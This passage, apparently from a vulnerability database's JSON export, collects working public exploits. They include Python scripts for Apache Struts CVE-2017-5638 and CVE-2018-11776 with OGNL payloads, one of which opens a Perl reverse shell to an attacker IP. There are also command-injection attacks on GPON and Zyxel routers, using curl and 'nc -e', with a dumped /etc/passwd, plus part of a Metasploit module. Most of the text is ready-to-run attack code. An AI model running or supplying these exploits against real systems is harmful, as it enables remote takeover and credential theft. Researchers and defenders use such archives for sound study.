java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}], "zdt": [{"lastseen": "2018-05-07T04:40:27", "description": "Exploit for hardware platform in category remote exploits", "cvss3": {}, "published": "2018-05-03T00:00:00", "type": "zdt", "title": "GPON Routers - Authentication Bypass / Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-10562", "CVE-2018-10561"], "modified": "2018-05-03T00:00:00", "id": "1337DAY-ID-30298", "href": "https://0day.today/exploit/description/30298", "sourceData": "#!/bin/bash\r\n \r\necho \"[+] Sending the Command\u2026 \"\r\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\r\ncurl -k -d \"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\\`$2\\`;$2&ipv=0\" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null\r\necho \"[+] Waiting\u2026.\"\r\nsleep 3\r\necho \"[+] Retrieving the ouput\u2026.\"\r\ncurl -k $1/diag.html?images/ 2>/dev/null | grep \u2018diag_result = \u2018 | sed -e \u2018s/\\\\n/\\n/g\u2019\n\n# 0day.today [2018-05-07] #", "sourceHref": "https://0day.today/exploit/30298", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-08T07:47:35", "description": "Exploit for hardware platform in category remote exploits", "cvss3": {}, "published": "2017-04-03T00:00:00", "type": "zdt", "title": "Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6884"], "modified": "2017-04-03T00:00:00", "id": "1337DAY-ID-27484", "href": "https://0day.today/exploit/description/27484", "sourceData": "# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection\r\n# Date: 2017-04-02\r\n# Exploit Author: Fluffy Huffy (trevor Hough)\r\n# Vendor Homepage: www.zyxel.com\r\n# Version: EMG2926 - V1.00(AAQT.4)b8\r\n# Tested on: linux\r\n# CVE : CVE-2017-6884\r\n \r\nOS command injection vulnerability was discovered in a commonly used\r\nhome router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools\r\nspecify the nslookup function. A malicious user may exploit numerous\r\nvectors to execute arbitrary commands on the router.\r\n \r\nExploit (Reverse Shell)\r\nhttps://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&\r\nping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p\r\n \r\nExploit (Dump Password File)\r\nRequest\r\nGET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1\r\nHost: 192.168.0.1\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: csd=9; sysauth=<Clipped>\r\nConnection: close\r\n \r\nResponse (Clipped)\r\n<textarea cols=\"80\" rows=\"15\" readonly=\"true\">root:x:0:0:root:/root:/bin/ash\r\ndaemon:*:1:1:daemon:/var:/bin/false\r\nftp:*:55:55:ftp:/home/ftp:/bin/false\r\nnetwork:*:101:101:network:/var:/bin/false\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\nsupervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash\r\nadmin:$1$<Clipped>:0:0:admin:/:/bin/fail\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/27484", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl_payload += \"(@[email\u00a0protected](#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email\u00a0protected]@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email\u00a0protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n 